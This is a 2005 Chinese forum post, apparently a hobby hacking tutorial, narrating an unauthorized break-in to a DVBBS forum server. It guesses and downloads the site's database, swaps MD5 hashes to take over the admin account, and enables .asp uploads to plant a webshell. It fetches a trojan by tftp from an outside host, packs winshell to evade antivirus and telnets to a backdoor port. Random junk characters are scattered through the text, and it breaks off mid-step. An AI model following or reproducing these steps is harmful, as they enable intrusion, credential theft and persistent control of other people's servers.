|
编者:文章题目很简单.内容却比题目有趣多了,建议各位看看 , ~" ]- @$ u$ h6 G
作者:ALLEN QQ:515659
0 B( ?( I! K6 l! ~: j# e4 r. {1 |今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿!
7 }0 q+ n6 E) U" z' A; N------------文章开始------------ $ ~# s4 N% x+ E2 @ N- v
为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧
! |% e5 B# d+ \晕~~~~, . R+ H1 @* d3 @3 N* }6 u
论坛错误信息
' J: x) y3 N, P, m产生错误的可能原因:
. l4 u& p- _7 a4 J您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。
% i$ I) H0 i& P" E4 N9 j3 X+ ]还要注册阿,可是论坛由于种种原因又不让注册
/ }2 _9 }# l" ]! }8 }气的我差点吐血! ' x( v7 Q% m' @% t
怎么办阿???唉,本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了吧,想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 7 Y4 w" J. L" N0 P
看来做了端口过滤 " c* G5 I$ j+ |4 J
没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧
& \; s$ L* r$ w2 ~- U8 p手动的找了一些,都不行 4 _! O ?! }, N: I
我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 - r1 s0 J5 J6 j( ]* x) [& q# v- p
_blank>http://aaa.com/data : e/ x% N$ {2 m3 d* Q
_blank>http://aaa.com/database
. q# W( B7 u) v2 K+ |# e& O+ `_blank>http://aaa.com/db " A# x& d, V O N0 g( f1 b
HTTP 错误 404 - 找不到文件 1 w9 n- E( Q! j. p8 A6 s( C
Internet 信息服务 7 Y, C7 W( j6 q. t8 ]5 e1 I
继续 5 W' Z& R% ]" @- u8 H; ^, y+ ~
_blank>http://aaa.com/mdb
2 ]; U Y, V/ s; D1 t3 b. R- N9 NHTTP 错误 403 - 禁止访问
" l. O3 Q4 P n* n0 F* PInternet Explorer 2 d X# ]# [) Y' z" I7 \
出现403错误就说明对方有这个目录,但是不允许浏览目录
3 D4 I6 U7 h& g" {想想看mdb这个目录会是干什么的??哈哈十有八九十存放数据库的目录!
* d o' E9 c% h: w8 c把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞
, F4 u) t& R2 r, R8 F) I7 Q. Pscaning.......,大概10分钟过去了 % ?% c. V* K4 k& b, l9 U5 ?
扫描结果
3 J) k/ ]6 e# n1 ` \- X/mdb/lovemaik.asa [漏洞描述] # B- i: N) O7 V; P' j9 g
哈哈哈,成功的扫到了数据库,顺便告诉大家一个技巧, ! L& E2 z. T d( O7 R4 c
把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! : m8 J: B; }6 w5 W' T7 O
xscan有一个好处就是可以直接扫域名,比如_blank>http://www.seeie.com
t- p3 }& N0 D+ u M& P这样的话xscan就会帮你猜数据库地址
2 a- P/ _& F, _( U' B/ b$ Z" R_blank>http://www.seeie.com/mdb/data.asp 5 W1 S3 ?# v9 q4 G3 X1 N- Q
_blank>http://www.seeie.com/mdb/db.mdb
9 Z6 e* s u. ]! y. y- ^.......
/ U/ U2 c2 |( ]1 n2 {# c+ p" K/ x# T& j/ N好了,现在打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了
* `+ d- ]% @. Z; }在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库并且把数据库扩展名改为.mdb,接着注册用户:allen,密码:123456
4 b% g1 `- ^2 W现在打开数据库,查看到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不能得到明文密码)
( k. e- K& u! P8 C好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字,把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里,好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改管理员的资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些人会问这样做是为什么,原因是动网论坛不允许通过email取回管理员的密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的)
+ ]8 n6 c+ o) f5 g现在我们拿到了论坛管理员的密码了, . {7 g3 R0 i: D, ]1 `
注意:以上步骤都是在本地操作的,其目的就是为了拿到论坛管理员密码!
2 v. [$ W8 d4 D- Y. e- x( }现在登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 , H/ `% G% p8 _' n! t% a; ^; H2 C3 ~
好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去
8 ?* I7 I- K# I$ p4 I! r好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去
0 _: h; k# w) n k6 ]可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp
) F' J0 c. w. T& q好了,成功了,接这运行木马***.com/bbs/use.asp?id=1
) N/ ^0 k+ d& A% x' x" Z2 l! o4 u呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把
- A- ^+ e* R' C, P; z靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳吧,这样可以逃过防火墙! & \5 u. Z7 Q/ n h: ?0 C% C' r
继续,传上去并执行。。。。没反应! , Z7 w$ D# o. e) R
先telnet ip 8210(我喜欢用noika手机的型号做为端口,) | 
IP卡
狗仔卡
发表于 2005-1-23 13:28
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
